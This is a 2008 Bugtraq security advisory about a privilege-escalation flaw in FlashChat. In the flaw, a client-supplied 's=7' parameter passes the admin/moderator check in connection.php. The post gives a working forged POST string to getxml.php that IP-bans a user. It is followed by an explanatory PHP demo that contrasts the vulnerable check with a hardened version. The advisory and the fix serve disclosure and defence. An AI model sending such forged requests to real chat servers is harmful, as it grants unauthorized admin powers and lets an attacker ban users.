Message-ID: <20081017144438.7383.qmail@securityfocus.com>
Date: 17 Oct 2008 14:44:38 -0000
From: ch0p83@...il.com
To: bugtraq@...urityfocus.com
Subject: flashchat severe bug

File: connection.php

if(
    ChatServer::userInRole($this->userid, ROLE_ADMIN) ||
    ChatServer::userInRole($this->userid, ROLE_MODERATOR) ||
    ($req['s'] == 7)   // <-- *bypass line*: a request-supplied value counts as a role
  )


This piece of code allows a normal user to bypass role filtering and be granted the admin role. To exploit the vulnerability, simply send this POST data string to getxml.php while in the chat (for example by intercepting and modifying a legitimate message packet sent to the server with the Tamper Data plugin for Firefox):

For example, to ban a user, simply add the bypass to the normal ban request string:

replace:
//normal message sent to server that has been intercepted
sendAndLoad=%5Btype%20Function%5D&t=hi everybody&r=0&id=

with:
//normal ban packet used by admins or mods
sendAndLoad=%5Btype%20Function%5D&t=&r=0&u=5581&b=3&c=banu&cid=1&id=

//forged packet sent by attacker
sendAndLoad=%5Btype%20Function%5D&s=7&t=&r=0&u=5581&b=3&c=banu&cid=1&id=

*note the s=7 added

This will IP-ban the user with id 5581 from the chat.

eLiSiA - 17-10-2008
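The root cause is that the authorization check accepts a value the client controls (`$req['s']`) as proof of a role. The following is an added example, not FlashChat's code, showing the quoted check beside a hardened form that consults only server-side state; `ChatServer`, the role constants and the user ids are hypothetical stand-ins constructed for the demonstration.

```php
<?php
// Added example, not FlashChat's own code. ChatServer and the role table below
// are hypothetical stand-ins: roles are looked up server-side only.
const ROLE_USER      = 1;
const ROLE_MODERATOR = 2;
const ROLE_ADMIN     = 3;

class ChatServer {
    // Server-side role table, user id => role (constructed sample data).
    private static $roles = [
        1    => ROLE_ADMIN,
        42   => ROLE_MODERATOR,
        5581 => ROLE_USER,
        7777 => ROLE_USER,
    ];

    public static function userInRole($userid, $role) {
        return isset(self::$roles[$userid]) && self::$roles[$userid] === $role;
    }
}

// Vulnerable form, as quoted in the advisory: any request carrying s=7
// satisfies the check, whatever the caller's real role is.
function mayBanVulnerable($userid, array $req) {
    return ChatServer::userInRole($userid, ROLE_ADMIN)
        || ChatServer::userInRole($userid, ROLE_MODERATOR)
        || (isset($req['s']) && (int)$req['s'] == 7);
}

// Hardened form: the decision depends only on the server-side role table.
// Nothing in $req can change the outcome, so a forged "s" field is ignored.
function mayBanHardened($userid, array $req) {
    return ChatServer::userInRole($userid, ROLE_ADMIN)
        || ChatServer::userInRole($userid, ROLE_MODERATOR);
}

// Decode the forged packet from the advisory the way getxml.php would receive it.
parse_str('sendAndLoad=%5Btype%20Function%5D&s=7&t=&r=0&u=5581&b=3&c=banu&cid=1&id=', $forged);

// Ordinary user 7777 submits the forged packet: the vulnerable check lets the
// ban through, the hardened check refuses it.
var_dump(mayBanVulnerable(7777, $forged));
var_dump(mayBanHardened(7777, $forged));

// A genuine moderator (id 42) is still authorized by the hardened check.
var_dump(mayBanHardened(42, $forged));
```

Any request field that is echoed into an authorization decision should be treated the same way as `s` here: dropped from the check, with the role resolved from the authenticated session or user record instead.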
